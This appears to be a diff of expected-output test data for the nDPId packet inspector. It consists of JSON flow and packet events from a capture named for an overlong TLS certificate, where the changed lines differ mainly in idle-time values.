00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1626168077780,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1626168077780,"pkt":"8BiYFWV8WNVuaKQACABFAABMU7FAADcR5NYR\/Tb7wKgBeQB7wEAAOB9pJAED6wAAAAAAAAALU0hNAOSX2YmMm6TtAAAAAAAAAADkl9mN1Ssd5+SX2Y3VLRfJ"} 
-00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1626168077848,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1626168077848,"pkt":"8BiYFWV8WNVuaKQACABFAABTEkpAADAGeM2MUnEawKgBeQG70pHkPsMTwD\/s34AYAEWx6wAAAQEICkDJEb890flmFQMDABpqQiSe8lZWsEgoTupah5UnGMUqJn8V431Q+A=="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1626168077848,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077848,"pkt":"8BiYFWV8WNVuaKQACABFAAA0EktAADAGeOuMUnEawKgBeQG70pHkPsMywD\/s34ARAEUESgAAAQEICkDJEcA90flm"} +00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1626168077848,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1626168077848,"pkt":"8BiYFWV8WNVuaKQACABFAABTEkpAADAGeM2MUnEawKgBeQG70pHkPsMTwD\/s34AYAEWx6wAAAQEICkDJEb890flmFQMDABpqQiSe8lZWsEgoTupah5UnGMUqJn8V431Q+A=="} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1626168077848,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077848,"pkt":"8BiYFWV8WNVuaKQACABFAAA0EktAADAGeOuMUnEawKgBeQG70pHkPsMywD\/s34ARAEUESgAAAQEICkDJEcA90flm"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168078653,"flow_last_seen":1626168078653,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1626168078653,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1626168078653,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1626168078653,"pkt":"WNVuaKQA8BiYFWV8CABFAABGLVcAAEARex\/AqAF5CAgICMseADUAMgvmotEBAAABAAAAAAAAAzIzNQIzMwIyMgEyB2luLWFkZHIEYXJwYQAADAAB"} 
00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168078653,"flow_last_seen":1626168078653,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1626168078653,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"235.33.22.2.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1626168078654,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1626168078654,"pkt":"WNVuaKQA8BiYFWV8CABFAABITn4AAEARWfbAqAF5CAgICMseADUANKzYlN8BAAABAAAAAAAAAjI2AzExMwI4MgMxNDAHaW4tYWRkcgRhcnBhAAAMAAE="} 00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":107,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168078653,"flow_last_seen":1626168078654,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1626168078654,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": 
{"query":"26.113.82.140.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168078673,"flow_last_seen":1626168078673,"flow_idle_time":7440000,"flow_min_l4_payload_len":1448,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1448,"flow_avg_l4_payload_len":1448,"midstream":1,"thread_ts_msec":1626168078673,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -02432{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1626168078673,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1502,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1502,"pkt_l4_len":1468,"thread_ts_msec":1626168078673,"pkt":"WNVuaKQA8BiYFWV8CABFAgXQAABAAEAGm5DAqAF5NGKjEtC1Absg2aa\/F4bv+FAQEACuIgAAFwMDCRUAAAAAAAAAWfKHBs70qmO4BAxw\/KH76VJthsd+JmhEdw9LbrjkTjI9b3XfM0DMNLKHxmQFc1wZ9+v47IezDEajRVIeCS0iuwLsGsA3YBgKp65J4M20GnYw3QEoWxPt99213+KI1CclXQzaueofFw\/qIILvmneWSh5sBJstqbtZLD2cDfq2tFoUseLZtuSKYL5M6qSNwvarEAmysHZgT7Udi\/a0Qp07Np4WgFkq\/a9MQH22ift7VaKutQa0mJmP19SdWXTILAVbvhO3J6cdL9EqjePIeIkXKca0uVG2cDnC+ogcIBgWiBVq1pQlzG6pgHKD3PRA0vNoda3MJ0atx621R\/WKvfMZJYbQztqn6MP4oCdEaJloUS59wJjijiLCZEHV1oirlnS2nC0LRIMkV0xOr2eStcvbZVXw4nOKDQS6H4Zgv11KltQC1JnlZF3H2hfUzks7VZJ1piCl7JLEyNiXPboWZlWGmZoEaDAEUa\/zJI4IEULQtYV9J4jBVG0LIyT8dLpi5cgu5HSsaKdQTef+rQO01UnLW77pUjM2FuWnb+vOmbNg9vroOAp08oUd4WURirzl+3HYtCcfBI3wOCJwEWivMjawTzc9kqNg6MLXXDVodJ+9u6ySbjGo8wdF8Ujzicfc0DHPbSwSWwzi48Lx1Xv3zlCdNcfYFQi2USvaYTxC82pbJFTcLcjA75y5d4uDzJFLRDQQPcLYiW1zyuRecgn4v\/HoR\/nQn8q3KO2aunXtZjN2Sgwq
a9bCj+P70uuLOr7LdCSf95Yuvv83BVkjI8LO\/K2GelZusfiw+ph2AM5v3nVCVFtVClMHt5LBbn90AGigLyLssV8usgvMte9WY2YO5RbaLrRuaQaZXq7xKP6I9rbLNl04xmGTkSwgMCnsYgpwvWgoxVEJKIK81LOzdRyjEIzviQKsdu5zYpaTUYn0gMWLbk8gisL6HsaNyyzZRZny4WG9c8rHaQ0AVF7OZHAfugm1G0Ya+4uTEO06lH0Y0luTPeZbk6BzWyTQN4kkdYJgzbQ\/H4fL96wAxDKYsoN4xb\/dNiL+rBxozbwW3E3YDpgsLBHEYXx\/9T+ZZByNcVhoanUoyeZR4La0nznczRNl0BSSAwop3ffF\/3weBpuyebCHd3nQY06YIOyKfw5o\/8+DIvbWrrftOtndpCOAfM8xK0ncs0qGgNDeHWSGhfqOCu4xsd1D6TNFpi+SoFxZbO162qCP1uQZqSIk3sB4T700Vag3Fmr5zAc2+Cy2sdC\/A9S2zr73WQ2tNqbvUTsm7mAOCy6fHXiJfrCMOm070Q3x\/hDA1F\/ri24teJTcz681Tpyzz98or8aBXhC1tirmfRKLeb1za5S0A5FpvCOErLaYZ7JnA2Hcnep7W9VvnkzVZD\/eh5PJxQTtMHNN3t73y3SocpYzsv4jecsMhINyJMQzKIZyFN7BeOFn3Icd72v79IVYW+OEMLTFGr\/z0a3l6KHAUNHg5OrTZy63kxeuj2oqpuTuGGW5OGR1vga0lB9LeT5DNs1fw4ET+3+xHSDQYEpIQCm73rmKpEzHnGvP6PaZFc3upw\/YvkfAML3GBWjg6BeNxYGhLgBq1U7bw1AAqe3KjEtHWznkCRp0j2b1yA1x473SNIk\/Tl0OU2uF4V2zDlzbygL3UGekyceZ9TOivgWvNEFgm3JDyB1JsgPkE1UA9Mb3RcUv6IS4oUKckZLMvYCqsp6JNk+hSM2SSYrjCpjVhAAYR\/Tw9J3qPbVuQ\/+0boJNNW9SXU3FXb1mu6\/UjowIaOU5yd1Ruw2HgKAG+TcnMQdTBDCV1Fn1s2Gos7GgJFmic+wrwQmUwvry3qcM4QfQn+KkqL+DVzAfZpY3UE5kKkQw09tvvvCnUub+fKLuuHs2xshp8SgWsVHUpe\/eGalaURu9E5+S5ef5NZPTZU4="} 
-01667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1626168078673,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":936,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":936,"pkt_l4_len":902,"thread_ts_msec":1626168078673,"pkt":"WNVuaKQA8BiYFWV8CABFAgOaAABAAEAGncbAqAF5NGKjEtC1Absg2axnF4bv+FAYEAByKgAA8hiRnjTuMaDQEL+CLYj0enfAkHVnXO7nV5IzKiak6sLS6qxgDE4htK9g2bjk3R484+O\/m3LR4RiopAnWolcjfbrpfWVb1lMjRimj35IfoR0InDQcTV+lqM1hnbaRsbPul7kk7yp40mdnMbGeSdokyNlVd+Gc2o9y\/kRGCp\/RqZF8PhlnvFvIilO8yiVaTaBmaNQ2c5Ph9+sPKU5aFL1uQpdr\/lZqIfEq2kVgCrdBeDo4qNeeQzKtJNsLVSSXJNaa5EbU9xA4Gcwa59FEb+z5l5k6kMngz8ZNuAlqyaHzifpWW3O+gJvTHlQKGmobQMi8ii1K+B8azR0rME7gHuYp8j9KIa090V1eZVPAqukxBBhYGnGZkUnr+FDlf1ZK\/6jjt\/FM8rQ\/lbeUUBqVgsa+O\/WxUto3U7xUvYDA5nlmX+JiSIl7TX4qI+Ru0aN0Akmto\/YQCR\/ts7jv1DeYAK5L5Yy2Vh6PLRQ4c+Pa\/92Jj4DNdt3iyKVflpKtt14Zke3huw2c2HHz1srDVPgqGpJqA\/eD7864eDOp49Ft0Yeo1yo62XnCO2MSq34SmUewekOqz3llMeY3SFHNG\/SCIEenKOH+ZLswKCtHaL23XWktzPIAvtiPaUe8OQwJHr\/lbrWuPFkD\/U0II2V8NaPz4AVb17oDlmuZOeHOf8JZ5gjU14hPhQ0t944FAWUouPhqgHpug4J7fVHUyJ1W0HeNumJ7723SardKLRg5P7i3J2r6\/9HqflhjXWWoqO31j\/pyOLWOUftD3uTRP8P11Cr3jlNVHTXBld4hude0v33CDpTR\/mf09FhR1Yz1vcA7zHJhk+Hem4vzglb2dTx3BT6MRYPvgUON2zk99ErenQrEGfd6PyJWO5iWwsY0xU8meKY2Jp0LdAk9BxGhy3LU4uTxR4t614VXg7Le3F2XXuKmjbJsQgbVMUYhVkJ6JBcddg15aCLR+YYoWrYgjp+WThS8gLNpJaxaihLqA77pNdcaI187nN+luEpN2fsVBRr1v588oPOg6ugZIMvvQGM\/932ci9FWgh+Egtrp9jWvgwN6C+x\/6Ul9gPKwr35MQ2L88mYUnXuuDGVnTkJ6VTWgAawJ1AxcwiThWo3unPbjvr6pM+jswTV6XOO7V8+41tsMKM1s8WPQI+YtWq8fuv3wgnLtmndqFCNp"} 
-00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":110,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168078673,"flow_last_seen":1626168078673,"flow_idle_time":7440000,"flow_min_l4_payload_len":1448,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1448,"flow_avg_l4_payload_len":1448,"midstream":1,"thread_ts_msec":1626168078673,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1626168078673,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1502,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1502,"pkt_l4_len":1468,"thread_ts_msec":1626168078673,"pkt":"WNVuaKQA8BiYFWV8CABFAgXQAABAAEAGm5DAqAF5NGKjEtC0AbvnBlzSyo5yyVAQEADxegAAFwMDCRUAAAAAAAAA26eDpJKN0BUxQmpzIi5g3ucuMMDrMgecHX\/CXiINnB6nf8RfrEh6QYh8SapIE51Wk64JXAUrOVrpUS79nUGqzqypD0Bb3GpnKslW+hVNJEAhzXjXlIms0Mdvn6rZf1ZDryhGsMaJdsIsDeqTE7cSjb\/AwDHg30Dyx\/033m2orYnQp+ZJ5N9NWzfNjr1H+vEJ2aGglmYbAeu\/eTtxNNfcP8qqdaUykL6lGIGhgLgYGMo5CMVqPKpBBKbvbUNBzJadRi9LHo18AgSCwBMZ6bHVYJDpuFL7e4MT+bXzL18TYFQOTCQfRi5j7DT1as0nLD6cQ0jKomb4NNz1M1ClcV55CitfGm0nMZU3GHOq9xlAFFOdfaUNUR+\/9UjqZ44ylRWAqJ6YHxWCQdtqMTvizXKZS4+o82xV4TJVbLkhSRuiz2uTEwwVxekQB2DDmh3GiR9Ye6GPUgczN\/oCVDwpIkKENeQcP\/6Pokh8HMAvZ2RSwo+VUg00wRguVh\/w3achjv22jf5I9GRZwEow5WUpfCf8lVnHG9wLFCzsLG1I8WMaT0TDTKmn7QoYLtSk2V04tAybQOMHVVI0hNhlfUXhSh+SCshPM17AY0UkKtRYcOa2eStGarsU2t5cfO840a2F+oCsIGDj3tvdR13INFmb7pHkKy+Q2V+4uyAMl+Ox8g+B18vuMUBFtZgxt4DO0uuOzFmplvXLtxD3fbrKuxl\/6k\/eCJsGdMUgzkQC\/tUwe4V3D4jZHwwQSFFI+17aKc3J7x1BEo6ekzNTJS1+B4LNLTfv+T0lK8gzRlr5u7\/zaM8tfLPPN37K2o1mRMRjA5iIukpvT8U5wOf5x\/TVVVdMA8FAaqdY6hLNRSvAFVtu5XaBHOcfP3sb1
XSB1z4GRcUCgiJxv+lQFekTDU9BS5oGQCQcC+WphKRrfjCRy8ZZhWK9J\/fFGeUgxNdNGEWCyhtCDvzCtVbUxSi2WZ66rDdU3aSKcEOMnDfpPuQ3aNkoqkdkwbdMewaWAPifWpjrrxg90ieLTE7FgbcxFjvhr5lFLSoRBF\/iPJs6lHTLDkWB5y15f1r\/8ZLDb4IhW9FIX\/CLiZ6rpS0mHTHUE9vn\/9hAsmx46xOm3J34VvMgqFYNluvzn3dUGnNnv4rW9ETLU5nx9MjAInMLEQZjDDkNtlaMy4FrKcYLZYQdYzERpfoBvKuaTJfKsWfO7jgAn1v6gbrSWphH3cXzQjxw802J0V4QeazmBVGA0E6lG79pCNEO0uh2dgwktSmtwiCBclBc5tjf6nl4O1l4nqizShQRxCCIPprqlc5ewvpot0KzGllydHXYVwvl3NqOGVnDVbcYW6rsr9cNQcgn1WFKVBGaaHM+XgnvZNhqKSKSS\/JwnHZ96JaxzHCfl4G5C2cceJe1cA34Dat1FKEtweJ9xvHyrHpcm5q9Vkp7cv2o7Ygb+hipT+4C1cSkXBVesDC0+tvSXpCsG73FkouarVtpL+0PQKkzAR1yJgDVrUYv9JCem0QTLOVmTHZ+lN3HGmtyIJYoBu1J4ll241iHn4yj6vQ701Nb8mVXZ6EpF\/5V+Ojw4OShpQ9K4JNfmRah1H4u1+tm5sdLnJXJCnxd1z1bP35y0tiPSMOaFD7D36ftgNesfeblmbdO3QvYo5sZjH2g\/rkgDvWctEdVPFefeneKNa6YJtDm2B1tmPiPBA9Oq0w39UHoupp7PhIxW8KMg8k6pOGMjzQ6Lk23qZ2phXBaaIaaOL394fc7c7DxLl8DqdGBlLveqkkwCREFnxvKjAePN1cC1XOtq0lnaYt1kQ27UguJ0fER9DAfYowgtFCNAKFVeNA3gSi1AQ+OtFaANU7+ThFzU9jKVufQm+9414vvr6INHdHhMJCKTXzk4z8zZd0u+NZ05MVhtrOOr5TlUY0TGx+kJE8="} 
-01656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1626168078673,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":936,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":936,"pkt_l4_len":902,"thread_ts_msec":1626168078673,"pkt":"WNVuaKQA8BiYFWV8CABFAgOaAABAAEAGncbAqAF5NGKjEtC0AbvnBmJ6yo5yyVAYEADQ3AAA8smVcb3q7jInDMp6iu2tmr5Z01S6ktfb24g2DVivJvFFx18svOuqK0sgnY23ZGcWDPabxfRHCA4+gQkog41eD9Q+jY8o9PdPxSEJPwKKiq97+swgykYZPYYGmASILHqMJuZfByhEv3xViLnOQSEMlZhcFWZRFTusxMYced9WKWA0fc6Tz6HTt2Slu4vTvwt52pLlywDQ+moDsDqD4uzlqRKVGfUL\/ch1qgzh1ik3fV6dkbtg2JStfj9+0gWhw\/1tpp41Yq3ViTYYlVWsBAlK9383UtTU6832bkiivRikzvg6xlr6cUoD8pfbv255mX4wGzTGlmpvD4zQbPqZWm+dyGHA4KTjyuOM3iUOXvN2EIc4hSFWRtZSWhTg95jPk2WAmsedaTcdmQKZ2viJIrwprKiA8pqElIbad4UayJEEQ2rLEHe+6Rkn7weFiJ9Cf4UMQ6av+K70+Y96itdD4PDv0OKsC6tZfU\/tfc4I3DNLWON4dS6I+6zur216gRLFptPxg8nJaKRiptY9M7sohpWI5akHqMg98N8hf2hc0wH9zfT\/L5fz7Z9CQdyywynd2mPmUEW9OWFeYn4wEC\/gdxA80M9Zzf7uv0KAn+8LelSJkvdI3pBiv4FC333GGWS6fic1Zy4pYfk+L8GFZinANnaiXdJr7xAtMQ1GYOBWAHKoH+GJ8tU2xACRvM36EvIAH0I2RrIzXjHRnEOXkSC+CLSu8xyz6ePYQHWJqTeOV24udwyFiAkzDPh7H2SHxmU7LHZwkam8rX9zgmZLxdYHlhAD2yJRjuwO6msg2yZjsqwSwxdSZJhRunBsHb4p7DEvQLMPjpsbatjtgVN9T+qsCyHCJEkFmMU3QsxkCGtossZlWOQrLODqkaHoKbAV0ZeWnv1dwukSAWvNXFgALrC\/LDs9Yk\/0HHogbwj5gGNEDtJS+nkfi7bA8yoN5eCDO2Vffn4zk+ciDVKaCLhgHHzVMIfIKVrI1fMzRQLNYRDWjxKcqdipYwYp0PAI+b3Yx\/DzTVijfHkaedZRCvCw9VPw+QLgF0VkIyTaHhWJgvUO1Zj1YHqbkkNGKFdwVWPQGrGrq1LqA0g1BITMzZ35AcyWNuoGr66LZrtpjF+wDWVoz964kvXYU00tfXiJSAYozGe62YqD95apGcA76\/XZl5+SMB+fuqPf"} 
-02440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1626168078674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1502,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1502,"pkt_l4_len":1468,"thread_ts_msec":1626168078674,"pkt":"WNVuaKQA8BiYFWV8CABFAgXQAABAAEAGm5DAqAF5NGKjEtC1Absg2a\/ZF4bv+FAQEAAXNQAAFwMDDxEAAAAAAAAAWp5GeZKPSB7w816DdrEEqHX9aC+YviuGDPWPZX1hWzeJO56tAdFAhHB2CxgaqBUmTp67G7NpRBSOlgFCk7Rz2PSU2RjHkzQN9DEZnqJDnpBJTPsDp7SajTr4PwFG5UIWqi9zReh9EtkjrIng35h3QjPy5pgRGIggIUa\/zHocLpnIHnx2NID0uKUJhEdZqWE4pcslJgdX4YfRKdEPTj3+9rZ3sLr++gXqMzrFGQr9EQgG6\/tRgaivaU0aW0ztmvO3\/qkvcrzeXMhBZCC0bJVz2bEiKKLd+7L5\/eHqmfs1xGLoIVjqoCMrClOzLnCDeSqZPqsY8tiTWubYavu9O8jG+ez+5Hkdw5Zqb5fD9oP0Ibcl2RZkNVM95HmLc4YD76gl\/z1R4Pv\/X+\/YqfzUCuKlbPSA2rgZ1AV5JLooIc7Be\/pYYpsCuIChG0LSB3wA5uDyqmIr57tSP8OI\/758hiFPERZ62qSkcVdehrui9bd5qubE0mTze86LYcawTdiQmMEKmQRBM4+o\/tLRLdTTAHx+8vIwh6AzvixYQvN8Ez8hb+phV92bD5q6hI7M8\/JGEZPjzNU+xKD+ISfZsgEkV2kgA1pedlTeMVuH\/BZclBXFLL5qRfhqeOdjAoZ73FOd8rYWzIde9ssd7E5A+tydX+O9p3kJTnLjhtup7pO1JKqLG8qs7kj4hnoO0t81p9EOSvl36UbBJ\/\/ta9Ym0CAwPBXdG+wAoJE7kndX2G2xUen+Ixk8fIsE2mGGvoV1Us4DqJZlvb5kJ5nWps2iI9sPEuDCreKTajgn6cDATXaCOavuKfFgCBU7JO2xOSJglSq7B7a6Rdhau\/3b0GgchjkVWsL6KTcuabDbsB3hgBi88ZjqfwCY2Nb9XY\/bt2EvOKRb8ymRF+9JboUUDmnm0q\/gX\/KH1nOauqAmFBE3aLfeWKAmW\/ItfqIuivKY+YDdWjc0HTcG1YGSfVrjr6aDU6y2TemMpnTIWRCWpvy7K5WBLe5V6MFlmxWmTIqOmq2cAefJgEppNDtGK3uWqgpEtHWR7rX\/TY7ljVAdLTNKRs1CNLO9YQxubR3nk57cLpnXbrfj+v+Lj4KuWOQnGZWe\/F\/8TM6cKx8vWkZgNLvg7fWbclvvuNbfQRKs6H63c6ZScHSu30WlwdJca10PuaOw6kUS8+8NgGoTM6EEL\/iGpUGKZDRPOSrSaO1EzIgUat4tPz1jNP77yXzl++\/KXlg43EyAlQZOnRr\/NFgfM4gzLfr7lDMDA3E0lRT+v95g78gwDuwXQ7BBPnvAls+NQwZbP7V0m0BvQjEB6p0fzqeSFPDpYbzQ0ZX6GjzMOnlKuf61RRwzVqCy8gfKQUs3skC1gvLgCV41uMUPTEfGnxmlKSMMVedbAmX+sTsKmnVgrA25Xxx44Rnz4aF\/zFkDRBzvExZFLH6OXGMRXTSfsHLF31OKw0QjcHdXKZOHlLQlo\/rph7r52bcX5wKB3t7
XosUhaCCO8kIb3nCkluBB+sXwJFoKumEHcqAVe9Z4M3C6DXD1eVQo5daa5wFvH9M6HZwbTveh7JVbvVN9W+ACJJ82iXxyheKmXUZCNDVrtQaESdZ59LGHrlE2HGCg9gGl6VFzZLygZFAEjriuVbNilai2NxLiYx9gUajnBWGV8FEvryyeJFk\/CE6DTkT5\/Kza\/2Cu73O0Rb9icER0MPyduoWRXyUIUkVQogDMSeWnU3q93wChqd9rGdeB4XXoIzzAE+R\/SRKrrCLHUwPWEq20rYRcseqENqusBQFpiEpsgV0CsZ5TY3+f7Z7A3Y\/FdWIGrpWpaXY666wWyBIvkxWFWygO7Vx3zPMA3tnlzCspk3L3LaW0mn2EnnX30PeY5vR3upafUEAXSo6G6QdKCFC0FARyFx\/T+JPasg5u4ToWCOaORH2gHwo="} -02146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1626168078674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1292,"pkt_l4_len":1258,"thread_ts_msec":1626168078674,"pkt":"WNVuaKQA8BiYFWV8CABFAgT+AABAAEAGnGLAqAF5NGKjEtC0AbvnBmXsyo5yyVAYEACH9AAAFwMDBNEAAAAAAAAA3P9mE\/WxzRlzhJVvrME7arSt4cc4b80\/fLZ45lg2jTLN+h8OznVOp0v0YJHlvGb6zo1R0y0127nCMLhWICtDPy2FtY028GLgaBdr\/YLaP88jpPC2wcimHwfty2x4WKI+LPeYoEPRAYicmmTAxPlFzZuaf1iKs+Yu1pMdI4311+rTrqclcjjttiygU+MPtoh4rbcQQi4hllQZ9bpYWoVqJ+iSt2BigYH05vsyHmu879GAhVkohrBF89b4NLKyNAMo0\/QxqgG1rqZTGisx7FjNs8y8uxtw5iKWrSpnhwqsK8HdkzdODGF90yeLdn3CCNJgdm3aNHt1MWZ4JOUy5GzAb47y2cy051il96yYxnPjPoqHZ+sb8GqydD+Wdtw8hwTtkDW7xa7mACJTwuWOIU79l2oDnl63ylL8+JOFMkvCyqpvRSJQTp84k5efBKX3KzQjur4Xu79lO0LFF2NRDD6HkdNIzdZ6GrjQ6cfeKSx84X\/NzyeoBGfExOO\/4zYWpKYV5emN2qK2WwFz9V6yUT4FYCEpMENn4zKRUt2gX3+QJ3UggRDfQ8Atlul6XoqofW\/JfCf+PszhgtXLpc9QxVs3UVfeC+BCBsI\/evJsy+X2zvUBACJp1Cao7EAa\/un53A8cu1w+QQ\/3\/qpgFcwuebDk+bTd2XwEmQcRY5ntXb11cm+t6EgiuWMc8LtkZLW4g6Qk7C3exETENqr8qaKtA57iz69EbEaWfUTp590Cm1yhdVWnzQVccpyZRGULka\/D5PTiR6o3UCqpNAg8I43q9sRPGdaOzmk6LqC8kGMMj1N8P2DVYvcwJb3HB14BO5Blfb4kQNaSZCX81P5eekubMcrCkaYeLnnSigA4c2KBCJI0\/apWCuj0F93qKZChgzKT77EQe9PNeEwH9qa2yEnfxe42M9M\/dR+ZqezhwWXFtPpr0H\/z1rdkNoyBVAssfrasWrQx8flrDgnBIYD1460XCzVYLXxrhZgLoJb3EnAJ7vXCxsY0pXppBEZDDdim91oHmoHdPCYl0He7JYRSbPjtQSoUoT
